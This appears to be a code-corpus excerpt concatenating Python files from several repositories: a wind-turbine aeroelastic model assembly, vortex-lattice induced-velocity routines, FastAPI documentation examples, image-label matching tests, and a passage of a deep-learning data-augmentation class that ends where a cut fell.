# numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
# cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
overhang = gc.AeroelasticInformation()
overhang.StructuralInformation.num_node = 3
overhang.StructuralInformation.num_node_elem = 3
overhang.StructuralInformation.compute_basic_num_elem()
node_pos = np.zeros((overhang.StructuralInformation.num_node,3), )
node_pos[:,0] += tower.StructuralInformation.coordinates[-1,0]
node_pos[:,0] += np.linspace(0.,overhang_len*np.sin(tilt*deg2rad), overhang.StructuralInformation.num_node)
node_pos[:,2] = np.linspace(0.,-overhang_len*np.cos(tilt*deg2rad), overhang.StructuralInformation.num_node)
# TODO: change the following by real values
# Same properties as the last element of the tower
print("WARNING: Using the structural properties of the last tower section for the overhang")
oh_mass_per_unit_length = tower.StructuralInformation.mass_db[-1,0,0]
oh_mass_iner = tower.StructuralInformation.mass_db[-1,3,3]
oh_EA = tower.StructuralInformation.stiffness_db[-1,0,0]
oh_GA = tower.StructuralInformation.stiffness_db[-1,1,1]
oh_GJ = tower.StructuralInformation.stiffness_db[-1,3,3]
oh_EI = tower.StructuralInformation.stiffness_db[-1,4,4]
overhang.StructuralInformation.generate_uniform_sym_beam(node_pos,
oh_mass_per_unit_length,
oh_mass_iner,
oh_EA,
oh_GA,
oh_GJ,
oh_EI,
num_node_elem = 3,
y_BFoR = 'y_AFoR',
num_lumped_mass=0)
overhang.StructuralInformation.boundary_conditions = np.zeros((overhang.StructuralInformation.num_node), dtype = int)
overhang.StructuralInformation.boundary_conditions[-1] = -1
overhang.AerodynamicInformation.set_to_zero(overhang.StructuralInformation.num_node_elem,
overhang.StructuralInformation.num_node,
overhang.StructuralInformation.num_elem)
tower.assembly(overhang)
tower.remove_duplicated_points(tol_remove_points)
######################################################################
## WIND TURBINE
######################################################################
# Assembly the whole case
wt = tower.copy()
hub_position = tower.StructuralInformation.coordinates[-1,:]
rotor.StructuralInformation.coordinates += hub_position
wt.assembly(rotor)
# Redefine the body numbers
wt.StructuralInformation.body_number *= 0
wt.StructuralInformation.body_number[tower.StructuralInformation.num_elem:wt.StructuralInformation.num_elem] += 1
######################################################################
## MULTIBODY
######################################################################
# Define the boundary condition between the rotor and the tower tip
LC1 = gc.LagrangeConstraint()
LC1.behaviour = 'hinge_node_FoR_constant_vel'
LC1.node_in_body = tower.StructuralInformation.num_node-1
LC1.body = 0
LC1.body_FoR = 1
LC1.rot_axisB = np.array([1.,0.,0.0])
LC1.rot_vel = -rotation_velocity
LC = []
LC.append(LC1)
# Define the multibody infromation for the tower and the rotor
MB1 = gc.BodyInformation()
MB1.body_number = 0
MB1.FoR_position = np.zeros((6,),)
MB1.FoR_velocity = np.zeros((6,),)
MB1.FoR_acceleration = np.zeros((6,),)
MB1.FoR_movement = 'prescribed'
MB1.quat = np.array([1.0,0.0,0.0,0.0])
MB2 = gc.BodyInformation()
MB2.body_number = 1
MB2.FoR_position = np.array([rotor.StructuralInformation.coordinates[0, 0], rotor.StructuralInformation.coordinates[0, 1], rotor.StructuralInformation.coordinates[0, 2], 0.0, 0.0, 0.0])
MB2.FoR_velocity = np.array([0.,0.,0.,0.,0.,rotation_velocity])
MB2.FoR_acceleration = np.zeros((6,),)
MB2.FoR_movement = 'free'
MB2.quat = algebra.euler2quat(np.array([0.0,tilt,0.0]))
MB = []
MB.append(MB1)
MB.append(MB2)
######################################################################
## RETURN
######################################################################
return wt, LC, MB
```
#### File: linear/src/libuvlm.py
```python
import numpy as np
import ctypes as ct
from sharpy.utils.sharpydir import SharpyDir
import sharpy.utils.ctypes_utils as ct_utils
import sharpy.linear.src.libalg as libalg
libc=ct_utils.import_ctypes_lib(SharpyDir + '/lib/', 'libuvlm')
cfact_biot=0.25/np.pi
VORTEX_RADIUS=1e-2 # numerical radious of vortex
VORTEX_RADIUS_SQ=VORTEX_RADIUS**2
# local mapping segment/vertices of a panel
svec=[0,1,2,3] # seg. number
avec=[0,1,2,3] # 1st vertex of seg.
bvec=[1,2,3,0] # 2nd vertex of seg.
LoopPanel=[(0,1),(1,2),(2,3),(3,0)] # used in eval_panel_{exp/comp}
def biot_panel_cpp(zetaP,ZetaPanel,gamma=1.0):
assert zetaP.flags['C_CONTIGUOUS'] and ZetaPanel.flags['C_CONTIGUOUS'],\
'Input not C contiguous'
velP=np.zeros((3,),order='C')
libc.call_biot_panel(
velP.ctypes.data_as(ct.POINTER(ct.c_double)),
zetaP.ctypes.data_as(ct.POINTER(ct.c_double)),
ZetaPanel.ctypes.data_as(ct.POINTER(ct.c_double)),
ct.byref(ct.c_double(gamma)))
return velP
def joukovski_qs_segment(zetaA,zetaB,v_mid,gamma=1.0,fact=0.5):
'''
Joukovski force over vetices A and B produced by the segment A->B.
The factor fact allows to compute directly the contribution over the
vertices A and B (e.g. 0.5) or include DENSITY.
'''
rab=zetaB-zetaA
fs=libalg.cross3d(v_mid,rab)
gfact=fact*gamma
return gfact*fs
def biot_segment(zetaP,zetaA,zetaB,gamma=1.0):
'''
Induced velocity of segment A_>B of circulation gamma over point P.
'''
# differences
ra=zetaP-zetaA
rb=zetaP-zetaB
rab=zetaB-zetaA
ra_norm,rb_norm=libalg.norm3d(ra),libalg.norm3d(rb)
vcross=libalg.cross3d(ra,rb)
vcross_sq=np.dot(vcross,vcross)
# numerical radious
if vcross_sq<(VORTEX_RADIUS_SQ*libalg.normsq3d(rab)):
return np.zeros((3,))
q=((cfact_biot*gamma/vcross_sq)*\
( np.dot(rab,ra)/ra_norm - np.dot(rab,rb)/rb_norm)) * vcross
return q
def biot_panel(zetaC,ZetaPanel,gamma=1.0):
'''
Induced velocity over point ZetaC of a panel of vertices coordinates
ZetaPanel and circulaiton gamma, where:
ZetaPanel.shape=(4,3)=[vertex local number, (x,y,z) component]
'''
q=np.zeros((3,))
for ss,aa,bb in zip(svec,avec,bvec):
q+=biot_segment(zetaC,ZetaPanel[aa,:],ZetaPanel[bb,:],gamma)
return q
def biot_panel_fast(zetaC,ZetaPanel,gamma=1.0):
'''
Induced velocity over point ZetaC of a panel of vertices coordinates
ZetaPanel and circulaiton gamma, where:
ZetaPanel.shape=(4,3)=[vertex local number, (x,y,z) component]
'''
Cfact=cfact_biot*gamma
q=np.zeros((3,))
R_list = zetaC-ZetaPanel
Runit_list=[R_list[ii]/libalg.norm3d(R_list[ii]) for ii in svec]
for aa,bb in LoopPanel:
RAB=ZetaPanel[bb,:]-ZetaPanel[aa,:] # segment vector
Vcr = libalg.cross3d(R_list[aa],R_list[bb])
vcr2=np.dot(Vcr,Vcr)
if vcr2<(VORTEX_RADIUS_SQ*libalg.normsq3d(RAB)):
continue
q+=( (Cfact/vcr2)*np.dot(RAB,Runit_list[aa]-Runit_list[bb]) ) *Vcr
return q
def panel_normal(ZetaPanel):
'''
return normal of panel with vertiex coordinates ZetaPanel, where:
ZetaPanel.shape=(4,3)
'''
# build cross-vectors
r02=ZetaPanel[2,:]-ZetaPanel[0,:]
r13=ZetaPanel[3,:]-ZetaPanel[1,:]
nvec=libalg.cross3d(r02,r13)
nvec=nvec/libalg.norm3d(nvec)
return nvec
def panel_area(ZetaPanel):
'''
return area of panel with vertices coordinates ZetaPanel, where:
ZetaPanel.shape=(4,3)
using Bretschneider formula - for cyclic or non-cyclic quadrilaters.
'''
# build cross-vectors
r02=ZetaPanel[2,:]-ZetaPanel[0,:]
r13=ZetaPanel[3,:]-ZetaPanel[1,:]
# build side vectors
r01=ZetaPanel[1,:]-ZetaPanel[0,:]
r12=ZetaPanel[2,:]-ZetaPanel[1,:]
r23=ZetaPanel[3,:]-ZetaPanel[2,:]
r30=ZetaPanel[0,:]-ZetaPanel[3,:]
# compute distances
d02=libalg.norm3d(r02)
d13=libalg.norm3d(r13)
d01=libalg.norm3d(r01)
d12=libalg.norm3d(r12)
d23=libalg.norm3d(r23)
d30=libalg.norm3d(r30)
A=0.25*np.sqrt( (4.*d02**2*d13**2) - ((d12**2+d30**2)-(d01**2+d23**2))**2 )
return A
if __name__=='__main__':
import cProfile
### verify consistency amongst models
gamma=4.
zeta0=np.array([1.0,3.0,0.9])
zeta1=np.array([5.0,3.1,1.9])
zeta2=np.array([4.8,8.1,2.5])
zeta3=np.array([0.9,7.9,1.7])
ZetaPanel=np.array([zeta0,zeta1,zeta2,zeta3])
zetaP=np.array([3.0,5.5,2.0])
zetaP=zeta2*0.3+zeta3*0.7
### verify model consistency
qref=biot_panel(zetaP,ZetaPanel,gamma=gamma)
qfast=biot_panel_fast(zetaP,ZetaPanel,gamma=gamma)
qcpp=biot_panel_cpp(zetaP,ZetaPanel,gamma=gamma)
ermax=np.max(np.abs(qref-qfast))
assert ermax<1e-16, 'biot_panel_fast not matching with biot_panel'
ermax=np.max(np.abs(qref-qcpp))
assert ermax<1e-16, 'biot_panel_cpp not matching with biot_panel'
### profiling
def run_biot_panel_cpp():
for ii in range(10000):
biot_panel_cpp(zetaP,ZetaPanel,gamma=3.)
def run_biot_panel_fast():
for ii in range(10000):
biot_panel_fast(zetaP,ZetaPanel,gamma=3.)
def run_biot_panel_ref():
for ii in range(10000):
biot_panel(zetaP,ZetaPanel,gamma=3.)
print('------------------------------------------ profiling biot_panel_cpp')
cProfile.runctx('run_biot_panel_cpp()',globals(),locals())
print('----------------------------------------- profiling biot_panel_fast')
cProfile.runctx('run_biot_panel_fast()',globals(),locals())
print('------------------------------------------ profiling biot_panel_ref')
cProfile.runctx('run_biot_panel_ref()',globals(),locals())
```
#### File: linear/src/pp_aero.py
```python
import numpy as np
def total_forces(data,Gframe=True):
'''
Compute total aerodynamic forces over all lifting surfaces.
Requires 'AeroForcesCalculator' to be run.
'''
ts_max=len(data.structure.timestep_info)
Fst=np.zeros((ts_max,6))
Fun=np.zeros((ts_max,6))
for tt in range(ts_max):
if Gframe:
faero_st=data.aero.timestep_info[tt].inertial_steady_forces
faero_un=data.aero.timestep_info[tt].inertial_unsteady_forces
else:
faero_st=data.aero.timestep_info[tt].body_steady_forces
faero_un=data.aero.timestep_info[tt].body_unsteady_forces
# sum over surfaces
Fst[tt,:]=np.sum(faero_st,axis=0)
Fun[tt,:]=np.sum(faero_un,axis=0)
return Fst,Fun
def saveh5(savedir,h5filename,data):
'''
Saves state of UVLM steady solution to h5 file.
'''
raise NameError('Function moved to save.save_aero!')
``` |
{
"source": "jomsdev/randomizedNLA",
"score": 3
} |
#### File: randomizedNLA/tests/utils.py
```python
from __future__ import division, print_function, absolute_import
import numpy as np
#
def make_random_dense_gaussian_matrix(n_rows, n_columns, mu=0, sigma=0.01):
"""
TODO: Document this function
"""
res = np.random.normal(mu, sigma, n_rows*n_columns)
return np.reshape(res, (n_rows, n_columns))
``` |
{
"source": "jomue/fastapi",
"score": 3
} |
#### File: docs_src/custom_response/tutorial008.py
```python
from fastapi import FastAPI
from fastapi.responses import StreamingResponse
some_file_path = "large-video-file.mp4"
app = FastAPI()
@app.get("/")
def main():
def iterfile(): # (1)
with open(some_file_path, mode="rb") as file_like: # (2)
yield from file_like # (3)
return StreamingResponse(iterfile(), media_type="video/mp4")
```
#### File: docs_src/path_operation_advanced_configuration/tutorial007.py
```python
from typing import List
import yaml
from fastapi import FastAPI, HTTPException, Request
from pydantic import BaseModel, ValidationError
app = FastAPI()
class Item(BaseModel):
name: str
tags: List[str]
@app.post(
"/items/",
openapi_extra={
"requestBody": {
"content": {"application/x-yaml": {"schema": Item.schema()}},
"required": True,
},
},
)
async def create_item(request: Request):
raw_body = await request.body()
try:
data = yaml.safe_load(raw_body)
except yaml.YAMLError:
raise HTTPException(status_code=422, detail="Invalid YAML")
try:
item = Item.parse_obj(data)
except ValidationError as e:
raise HTTPException(status_code=422, detail=e.errors())
return item
``` |
{
"source": "jo-mueller/biapol-utilities",
"score": 3
} |
#### File: biapol_utilities/data/_data.py
```python
from skimage import io
import numpy as np
import matplotlib
import os
data_dir = os.path.abspath(os.path.dirname(__file__))
def blobs():
"""Gray-level "blobs" image [1].
Can be used for segmentation and denoising examples.
Returns
-------
blobs : (256, 254) uint8 ndarray
Blobs image.
References
----------
.. [1] https://imagej.nih.gov/ij/images/
"""
return io.imread(os.path.join(data_dir, "blobs.png"))
def labels_colormap():
if not hasattr(labels_colormap, "labels_cmap"):
state = np.random.RandomState(1234567890)
lut = state.rand(65537, 3)
lut[0, :] = 0
labels_colormap.labels_cmap = matplotlib.colors.ListedColormap(lut)
return labels_colormap.labels_cmap
```
#### File: biapol-utilities/tests/test_jaccard_score.py
```python
from biapol_utilities import label
import numpy as np
def test_compare_labels():
a = np.asarray([5, 0, 0, 1, 1, 1, 2, 2])
b = np.asarray([5, 0, 0, 1, 1, 1, 2, 3])
result = label.compare_labels(a, b)
assert('jaccard_score' in result.columns)
assert('dice_score' in result.columns)
def test_compare_labels2():
a = np.asarray([5, 0, 0, 1, 1, 1, 2, 2])
b = np.asarray([6, 0, 0, 1, 1, 1, 2, 3])
result = label.compare_labels(a, b)
assert(np.max(result.label) == np.max([a, b]))
def test_compare_labels3():
a = np.asarray([5, 0, 0, 1, 1, 1, 2, 2])
b = np.asarray([6, 0, 0, 1, 1, 1, 2, 3])
result = label.compare_labels(a, b)
assert(result[result.label == 0].jaccard_score.to_numpy()[0] == 1.0)
if __name__ == "__main__":
test_compare_labels()
test_compare_labels2()
test_compare_labels3()
```
#### File: biapol-utilities/tests/test_match_labels.py
```python
import numpy as np
from biapol_utilities import label
def test_match_labels():
labels_x = np.asarray([1, 1, 1, 0, 0, 2, 2, 4, 4, 4, 0], dtype=np.uint8)
labels_y = labels_x * 2
matching_method1 = label.match_max_similarity
matching_method2 = label.match_gale_shapley
labels_y_matched1 = label.match_labels(labels_x, labels_y,
matching_method=matching_method1)
labels_y_matched2 = label.match_labels(labels_x, labels_y,
matching_method=matching_method2)
assert np.array_equal(labels_y_matched1, labels_x)
assert np.array_equal(labels_y_matched2, labels_x)
def test_match_labels_2():
labels_x = np.asarray([1, 1, 6, 0, 0, 3, 3, 4, 4, 4, 0], dtype=np.uint8)
labels_y = np.asarray([1, 1, 3, 0, 0, 2, 2, 5, 5, 5, 4], dtype=np.uint8)
reference_y_matched = np.asarray([1, 1, 6, 0, 0, 3, 3, 4, 4, 4, 7],
dtype=np.uint8)
matching_method = label.match_max_similarity
labels_y_matched = label.match_labels(labels_x, labels_y,
matching_method=matching_method)
assert np.array_equal(labels_y_matched, reference_y_matched)
def test_match_labels_3():
labels_x = np.asarray([1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 0], dtype=np.uint8)
labels_y = np.asarray([1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4], dtype=np.uint8)
reference_y_matched = np.asarray([1, 1, 4, 4, 4, 2, 2, 2, 3, 3, 3],
dtype=np.uint8)
matching_method = label.match_gale_shapley
labels_y_matched = label.match_labels(labels_x, labels_y,
matching_method=matching_method,
filter_method=None)
assert np.array_equal(labels_y_matched, reference_y_matched)
def test_gale_shapley():
labels_x = np.asarray([0, 1, 2, 3])
labels_ref = np.asarray([0, 2, 1, 3])
similarity_matrix = [[0.1, 0.0, 0.0, 0.0],
[0.0, 0.2, 0.5, 0.8],
[0.0, 0.9, 0.2, 0.5],
[0.0, 0.8, 0.7, 0.81]]
similarity_matrix = np.asarray(similarity_matrix)
output = label.match_gale_shapley(labels_x, labels_x, similarity_matrix)
assert np.array_equal(output, labels_ref)
def test_gale_shapley2():
labels_x = np.asarray([0, 1, 2, 3])
labels_ref = np.asarray([0, 2, 3, 1])
similarity_matrix = [[0.1, 0.0, 0.0, 0.0],
[0.0, 0.5, 0.51, 0.4],
[0.0, 0.55, 0.4, 0.3],
[0.0, 0.6, 0.45, 0.5]]
similarity_matrix = np.asarray(similarity_matrix)
output = label.match_gale_shapley(labels_x, labels_x, similarity_matrix)
assert np.array_equal(output, labels_ref)
if __name__ == "__main__":
test_gale_shapley2()
test_gale_shapley()
test_match_labels_3()
test_match_labels_2()
test_match_labels()
``` |
{
"source": "jo-mueller/EPySeg",
"score": 2
} |
#### File: deeplearning/augmentation/meta.py
```python
from matplotlib import pyplot as plt
from epyseg.deeplearning.augmentation.generators.data import DataGenerator
from epyseg.deeplearning.augmentation.generators.meta import MetaGenerator
import numpy as np
# logging
from epyseg.tools.logger import TA_logger
logger = TA_logger()
# MINIMAL_AUGMENTATIONS = [{'type': None}, {'type': None},{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'}, {'type': 'translate'}, {'type': 'rotate'}]
# added intensity shifts to the minimal augmentation --> should make it more robust for masking
MINIMAL_AUGMENTATIONS = [{'type': None}, {'type': None},{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'}, {'type': 'translate'}, {'type': 'rotate'},{'type': 'random_intensity_gamma_contrast'}, {'type': 'intensity'}, {'type': 'random_intensity_gamma_contrast'}, {'type': 'intensity'}]
ALL_AUGMENTATIONS_BUT_INVERT_AND_HIGH_NOISE = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'},
{'type': 'low noise'}, {'type': 'high noise'}, {'type': 'stretch'}]
ALL_AUGMENTATIONS_BUT_INVERT = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'}, {'type': 'low noise'},
{'type': 'high noise'}, {'type': 'stretch'}]
ALL_AUGMENTATIONS_BUT_INVERT_AND_NOISE = [{'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'}, {'type': 'shear'},
{'type': 'flip'}, {'type': 'rotate'}, {'type': 'stretch'},
{'type': 'rotate (interpolation free)'},
{'type': 'rotate (interpolation free)'},
{'type': 'rotate (interpolation free)'}]
ALL_AUGMENTATIONS = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'}, {'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'}, {'type': 'invert'}, {'type': 'low noise'},
{'type': 'high noise'}, {'type': 'stretch'}]
ALL_AUGMENTATIONS_BUT_HIGH_NOISE = [{'type': None}, {'type': None}, {'type': 'zoom'}, {'type': 'blur'},
{'type': 'translate'},
{'type': 'shear'}, {'type': 'flip'}, {'type': 'rotate'}, {'type': 'invert'},
{'type': 'low noise'}, {'type': 'stretch'}]
STRETCHED_AUG_EPITHELIA = [{'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'invert'}, {'type': 'flip'}, {'type': 'translate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'}]
STRETCHED_AUG_EPITHELIA_2 = [{'type': None}, {'type': None}, {'type': None}, {'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'invert'},{'type': 'invert'},{'type': 'invert'},{'type': 'invert'}, {'type': 'flip'}, {'type': 'translate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'}]
STRETCHED_AUG_EPITHELIA_3 = [{'type': None}, {'type': None}, {'type': None}, {'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'flip'}, {'type': 'translate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'},{'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}]
STRETCHED_AUG_EPITHELIA_4 = [{'type': None}, {'type': None}, {'type': 'stretch'}, {'type': 'stretch'},
{'type': 'stretch'}, {'type': 'flip'}, {'type': 'translate'},{'type': 'flip'}, {'type': 'zoom'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'rotate'}, {'type': 'rotate'}, {'type': 'rotate'},
{'type': 'zoom'}, {'type': 'blur'}, {'type': 'shear'}, {'type': 'rotate'}, {'type': 'low noise'},{'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}]
TRAINING_FOR_BEGINNING_LITTLE_INTERPOLATION = [{'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': 'rotate (interpolation free)'}, {'type': None}, {'type': 'flip'}, {'type': 'translate'}, {'type': 'blur'}]
NO_AUGMENTATION = [{'type': None}]
TEST_AUGMENTATION = [{'type': 'invert'}]
SAFE_AUGMENTATIONS_FOR_SINGLE_PIXEL_WIDE = [{'type': None}, {'type': 'blur'}, {'type': 'translate'}, {'type': 'flip'}]
SAFE_AUGMENTATIONS_FOR_SINGLE_PIXEL_WIDE_PLUS_INVERT_AND_NOISE = [{'type': None}, {'type': 'blur'},
{'type': 'translate'}, {'type': 'flip'},
{'type': 'invert'}, {'type': 'low noise'}]
class MetaAugmenter:
def __init__(self, inputs=None, outputs=None, output_folder=None, input_shape=(None, None, None, 1),
output_shape=(None, None, None, 1), input_channel_of_interest=None, output_channel_of_interest=None,
input_channel_reduction_rule='copy channel of interest to all channels',
input_channel_augmentation_rule='copy channel of interest to all channels',
output_channel_reduction_rule='copy channel of interest to all channels',
output_channel_augmentation_rule='copy channel of interest to all channels',
augmentations=None, crop_parameters=None, mask_dilations=None, infinite=False,
default_input_tile_width=128, default_input_tile_height=128,
default_output_tile_width=128, default_output_tile_height=128,
keep_original_sizes=False,
input_normalization={'method': 'Rescaling (min-max normalization)', 'range': [0, 1],
'individual_channels': True},
output_normalization={'method': 'Rescaling (min-max normalization)', 'range': [0, 1],
'individual_channels': True},
validation_split=0, test_split=0,
shuffle=True, clip_by_frequency=None, is_predict_generator=False, overlap_x=0, overlap_y=0,
batch_size=None, batch_size_auto_adjust=False, invert_image=False, input_bg_subtraction=None, create_epyseg_style_output=None, remove_n_border_mask_pixels=None,
is_output_1px_wide=False, rebinarize_augmented_output=False,
rotate_n_flip_independently_of_augmentation=False,
mask_lines_and_cols_in_input_and_mask_GT_with_nans=None, # should be 'id' or 'noid' and requires a custom loss and metrics --> can only be applied with some losses
z_frames_to_add=None,
**kwargs):
self.augmenters = []
self.inputs = inputs
self.outputs = outputs
self.output_folder = output_folder
self.input_shape = input_shape
self.output_shape = output_shape
self.input_channel_of_interest = input_channel_of_interest
self.output_channel_of_interest = output_channel_of_interest
self.input_channel_reduction_rule = input_channel_reduction_rule
self.input_channel_augmentation_rule = input_channel_augmentation_rule
self.output_channel_reduction_rule = output_channel_reduction_rule
self.output_channel_augmentation_rule = output_channel_augmentation_rule
self.augmentations = augmentations
self.crop_parameters = crop_parameters
self.batch_size = batch_size
self.batch_size_auto_adjust = batch_size_auto_adjust
self.invert_image = invert_image
self.input_bg_subtraction = input_bg_subtraction
self.create_epyseg_style_output=create_epyseg_style_output
self.remove_n_border_mask_pixels = remove_n_border_mask_pixels
self.is_output_1px_wide = is_output_1px_wide
self.rebinarize_augmented_output = rebinarize_augmented_output
self.rotate_n_flip_independently_of_augmentation = rotate_n_flip_independently_of_augmentation
self.mask_lines_and_cols_in_input_and_mask_GT_with_nans = mask_lines_and_cols_in_input_and_mask_GT_with_nans
self.z_frames_to_add = z_frames_to_add
self.mask_dilations = mask_dilations
self.infinite = infinite
self.default_input_tile_width = default_input_tile_width
self.default_input_tile_height = default_input_tile_height
self.default_output_tile_width = default_output_tile_width
self.default_output_tile_height = default_output_tile_height
self.keep_original_sizes = keep_original_sizes
self.input_normalization = input_normalization
self.output_normalization = output_normalization
self.validation_split = validation_split
self.test_split = test_split
self.shuffle = shuffle
self.clip_by_frequency = clip_by_frequency
self.is_predict_generator = is_predict_generator
self.overlap_x = overlap_x
self.overlap_y = overlap_y
if inputs is not None:
for i, inp in enumerate(inputs):
if outputs is not None:
cur_output = outputs[i]
else:
cur_output = None
self.augmenters.append(
DataGenerator(inputs=inp, outputs=cur_output, output_folder=output_folder, input_shape=input_shape,
output_shape=output_shape, input_channel_of_interest=input_channel_of_interest,
output_channel_of_interest=output_channel_of_interest,
input_channel_reduction_rule=input_channel_reduction_rule,
input_channel_augmentation_rule=input_channel_augmentation_rule,
output_channel_reduction_rule=output_channel_reduction_rule,
output_channel_augmentation_rule=output_channel_augmentation_rule,
augmentations=augmentations, crop_parameters=crop_parameters,
mask_dilations=mask_dilations,
infinite=infinite, default_input_tile_width=default_input_tile_width,
default_input_tile_height=default_input_tile_height,
default_output_tile_width=default_output_tile_width,
default_output_tile_height=default_output_tile_height,
keep_original_sizes=keep_original_sizes,
input_normalization=input_normalization,
output_normalization=output_normalization,
validation_split=validation_split, test_split=test_split,
shuffle=shuffle,
clip_by_frequency=clip_by_frequency,
is_predict_generator=is_predict_generator, overlap_x=overlap_x, overlap_y=overlap_y,
invert_image=invert_image, input_bg_subtraction=input_bg_subtraction, create_epyseg_style_output=create_epyseg_style_output, remove_n_border_mask_pixels=remove_n_border_mask_pixels,
is_output_1px_wide=is_output_1px_wide,
rebinarize_augmented_output=rebinarize_augmented_output,
rotate_n_flip_independently_of_augmentation=rotate_n_flip_independently_of_augmentation,
mask_lines_and_cols_in_input_and_mask_GT_with_nans=mask_lines_and_cols_in_input_and_mask_GT_with_nans,
z_frames_to_add = z_frames_to_add
))
def _get_significant_parameter(self, local_param, global_param):
if local_param is not None:
return local_param
else:
return global_param
def appendDatasets(self, datasets=None, augmentations=None, **kwargs):
logger.debug('datasets ' + str(datasets))
logger.debug('augs ' + str(augmentations))
if datasets is None:
return
# parse and handle inputs
for dataset in datasets:
fused = {**dataset, 'augmentations': augmentations}
# print('fused', fused)
self.append(**fused)
def append(self, inputs=None, outputs=None, output_folder=None, input_shape=None, output_shape=None,
input_channel_of_interest=None, output_channel_of_interest=None,
input_channel_reduction_rule=None, input_channel_augmentation_rule=None,
output_channel_reduction_rule=None, output_channel_augmentation_rule=None,
augmentations=None, crop_parameters=None, mask_dilations=None, infinite=None,
default_input_tile_width=None, default_input_tile_height=None, default_output_tile_width=None,
default_output_tile_height=None, keep_original_sizes=None, input_normalization=None,
output_normalization=None, validation_split=None, test_split=None,
shuffle=None, clip_by_frequency=None,
is_predict_generator=None, overlap_x=None, overlap_y=None, invert_image=None, input_bg_subtraction=None,create_epyseg_style_output=None,
remove_n_border_mask_pixels=None, is_output_1px_wide=None, rebinarize_augmented_output=None,
rotate_n_flip_independently_of_augmentation=None,mask_lines_and_cols_in_input_and_mask_GT_with_nans=None,
z_frames_to_add = None,
**kwargs):
# print('debug 123', inputs, outputs, self.inputs, self.outputs)
# inputs and outputs are ok --> why is there a bug then????
self.augmenters.append(
DataGenerator(inputs=self._get_significant_parameter(inputs, self.inputs),
outputs=self._get_significant_parameter(outputs, self.outputs),
output_folder =self._get_significant_parameter(output_folder, self.output_folder),
input_shape=self._get_significant_parameter(input_shape, self.input_shape),
output_shape=self._get_significant_parameter(output_shape, self.output_shape),
input_channel_of_interest=self._get_significant_parameter(input_channel_of_interest,
self.input_channel_of_interest),
output_channel_of_interest=self._get_significant_parameter(output_channel_of_interest,
self.output_channel_of_interest),
input_channel_reduction_rule=self._get_significant_parameter(input_channel_reduction_rule,
self.input_channel_reduction_rule),
input_channel_augmentation_rule=self._get_significant_parameter(
input_channel_augmentation_rule, self.input_channel_augmentation_rule),
output_channel_reduction_rule=self._get_significant_parameter(output_channel_reduction_rule,
self.output_channel_reduction_rule),
output_channel_augmentation_rule=self._get_significant_parameter(
output_channel_augmentation_rule, self.output_channel_augmentation_rule),
augmentations=self._get_significant_parameter(augmentations, self.augmentations),
crop_parameters=self._get_significant_parameter(crop_parameters, self.crop_parameters),
mask_dilations=self._get_significant_parameter(mask_dilations, self.mask_dilations),
infinite=self._get_significant_parameter(infinite, self.infinite),
default_input_tile_width=self._get_significant_parameter(default_input_tile_width,
self.default_input_tile_width),
default_input_tile_height=self._get_significant_parameter(default_input_tile_height,
self.default_input_tile_height),
default_output_tile_width=self._get_significant_parameter(default_output_tile_width,
self.default_output_tile_width),
default_output_tile_height=self._get_significant_parameter(default_output_tile_height,
self.default_output_tile_height),
keep_original_sizes=self._get_significant_parameter(keep_original_sizes,
self.keep_original_sizes),
validation_split=self._get_significant_parameter(validation_split, self.validation_split),
test_split=self._get_significant_parameter(test_split, self.test_split),
shuffle=self._get_significant_parameter(shuffle, self.shuffle),
clip_by_frequency=self._get_significant_parameter(clip_by_frequency, self.clip_by_frequency),
is_predict_generator=self._get_significant_parameter(is_predict_generator,
self.is_predict_generator),
overlap_x=self._get_significant_parameter(overlap_x, self.overlap_x),
overlap_y=self._get_significant_parameter(overlap_y, self.overlap_y),
invert_image=self._get_significant_parameter(invert_image, self.invert_image),
input_bg_subtraction=self._get_significant_parameter(input_bg_subtraction, self.input_bg_subtraction),
create_epyseg_style_output=self._get_significant_parameter(create_epyseg_style_output, self.create_epyseg_style_output),
remove_n_border_mask_pixels=self._get_significant_parameter(remove_n_border_mask_pixels,
self.remove_n_border_mask_pixels),
input_normalization=self._get_significant_parameter(input_normalization,
self.input_normalization),
output_normalization=self._get_significant_parameter(output_normalization,
self.output_normalization),
is_output_1px_wide=self._get_significant_parameter(is_output_1px_wide,
self.is_output_1px_wide),
rebinarize_augmented_output=self._get_significant_parameter(rebinarize_augmented_output,
self.rebinarize_augmented_output),
rotate_n_flip_independently_of_augmentation=self._get_significant_parameter(rotate_n_flip_independently_of_augmentation,
self.rotate_n_flip_independently_of_augmentation),
mask_lines_and_cols_in_input_and_mask_GT_with_nans=self._get_significant_parameter(mask_lines_and_cols_in_input_and_mask_GT_with_nans,
self.mask_lines_and_cols_in_input_and_mask_GT_with_nans),
